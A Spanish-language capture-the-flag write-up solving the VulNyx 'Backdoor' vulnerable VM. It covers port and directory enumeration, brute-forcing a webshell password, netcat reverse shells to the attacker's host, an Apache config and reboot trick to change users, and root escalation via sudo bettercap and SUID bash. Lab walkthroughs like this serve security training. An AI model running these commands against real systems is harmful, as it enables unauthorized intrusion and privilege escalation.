VulNyx - Backdoor
Information
Backdoor es una máquina virtual vulnerable Linux de dificultad difícil de la plataforma VulNyx, fue creada por el usuario d4t4s3c y funciona correctamente en los hipervisores VirtualBox y VMware.
Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:29 CET
Nmap scan report for 192.168.1.88
Host is up (0.000090s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
❯ nmap -sVC -p22,80 192.168.1.88
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-22 17:30 CET
Nmap scan report for 192.168.1.88
Host is up (0.00087s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
Shell (www-data)
80/TCP (HTTP)
Site
Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.88/
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.88/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 277]
/Backdoor (Status: 301) [Size: 315] [--> http://192.168.1.88/Backdoor/]
Progress: 220546 / 220547 (100.00%)
===============================================================
Finished
===============================================================
En la ruta /Backdoor no tengo capacidad de directory listing y da un código 403 (Forbbiden)
Al llamarse Backdoor la ruta, uso un wordlist de SecLists especifico para backdoors
❯ gobuster dir -w /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -u http://192.168.1.88/Backdoor
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.88/Backdoor
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/php-backdoor.php (Status: 200) [Size: 1432]
Progress: 422 / 423 (99.76%)
===============================================================
Finished
===============================================================
En php-backdoor.php encuentro una webshell que parece estar protegida
Password Brute Force
Al no disponer de un nombre de usuario, se puede intuir que solo existe un parámetro llamado password o similar en la webshell
❯ wfuzz -c -w /opt/techyou.txt -d 'password=FUZZ&cmd=id' -u "http://192.168.1.88/Backdoor/php-backdoor.php" --hh=1432 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.88/Backdoor/php-backdoor.php
Total requests: 10000
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000004806: 200 64 L 124 W 1486 Ch "newpassword"
Total time: 6.162413
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 1622.740
Obtengo el password newpassword y consigo ejecutar comandos como usuario www-data
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=id" |tail -n1
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse Shell
Ya ejecutando comandos intento obtener una reverse shell
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
Obtengo la shell como usuario www-data
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 45766
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
backdoor
Shell (rootkit)
Enumeration
Sudo
El usuario www-data puede ejecutar como root el binario reboot con sudo
(Esto solo permite reiniciar el sistema)
www-data@backdoor:/$ sudo -l
Matching Defaults entries for www-data on backdoor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on backdoor:
(root) NOPASSWD: /usr/sbin/reboot
Writable Files
El usuario www-data tiene permisos de escritura en el archivo /etc/apache2/apache2.conf
www-data@backdoor:/$ find / -writable -type f 2>/dev/null |grep -vE "proc|sys|var"
/etc/apache2/apache2.conf
Abuse
Teniendo en cuenta los permisos sobre el archivo /etc/apache2/apache2.conf, se puede cambiar el usuario que levanta el servicio Apache2 de www-data a rootkit y posteriormente reiniciar el sistema con sudo /usr/sbin/reboot aplicando los cambios
www-data@backdoor:/$ echo -en 'User rootkit\nGroup rootkit' >> /etc/apache2/apache2.conf
www-data@backdoor:/$ tail -n2 /etc/apache2/apache2.conf ;echo
User rootkit
Group rootkit
www-data@backdoor:/$ sudo -u root /usr/sbin/reboot
Tras reiniciar el sistema obtengo una shell como usuario rootkit
❯ curl -s "http://192.168.1.88/Backdoor/php-backdoor.php" --data "password=newpassword&cmd=nc 192.168.1.10 443 -e /bin/sh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.88] 55786
id ; hostname
uid=1000(rootkit) gid=1000(rootkit) groups=1000(rootkit)
backdoor
Privilege Escalation
Enumeration
Sudo
El usuario rootkit puede ejecutar como root el binario bettercap con sudo
rootkit@backdoor:/$ sudo -l
Matching Defaults entries for rootkit on backdoor:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User rootkit may run the following commands on backdoor:
(root) NOPASSWD: /usr/bin/bettercap
Revisando el help de bettercap veo algo interesante
! COMMAND : Execute a shell command and print its output.
rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap
bettercap v2.32.0 (built for linux amd64 with go1.15.15) [type 'help' for a list of commands]
192.168.1.0/24 > 192.168.1.88 » [18:14:33] [sys.log] [war] Could not find mac for
192.168.1.0/24 > 192.168.1.88 » help
help MODULE : List available commands or show module specific help if no module name is provided.
active : Show information about active modules.
quit : Close the session and exit.
sleep SECONDS : Sleep for the given amount of seconds.
get NAME : Get the value of variable NAME, use * alone for all, or NAME* as a wildcard.
set NAME VALUE : Set the VALUE of variable NAME.
read VARIABLE PROMPT : Show a PROMPT to ask the user for input that will be saved inside VARIABLE.
clear : Clear the screen.
include CAPLET : Load and run this caplet in the current session.
! COMMAND : Execute a shell command and print its output.
alias MAC NAME : Assign an alias to a given endpoint given its MAC address.
Abuse
Le asigno permisos 4755 (SUID) a la /bin/bash
rootkit@backdoor:/$ sudo -u root /usr/bin/bettercap
192.168.1.0/24 > 192.168.1.88 » !ls -l /bin/bash
-rwxr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
192.168.1.0/24 > 192.168.1.88 » !chmod 4755 /bin/bash
192.168.1.0/24 > 192.168.1.88 » !ls -l /bin/bash
-rwsr-xr-x 1 root root 1234376 Mar 27 2022 /bin/bash
192.168.1.0/24 > 192.168.1.88 » exit
Me convierto en usuario root
rootkit@backdoor:/$ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(rootkit) gid=1000(rootkit) euid=0(root) groups=1000(rootkit)
backdoor
Flags
Ya como usuario root puedo leer las flags user.txt y root.txt
bash-5.1# find / -name user.txt -o -name root.txt |xargs cat
d9e69***************************
40390***************************
Hasta aquí la resolución de la máquina Backdoor.
Happy Hacking!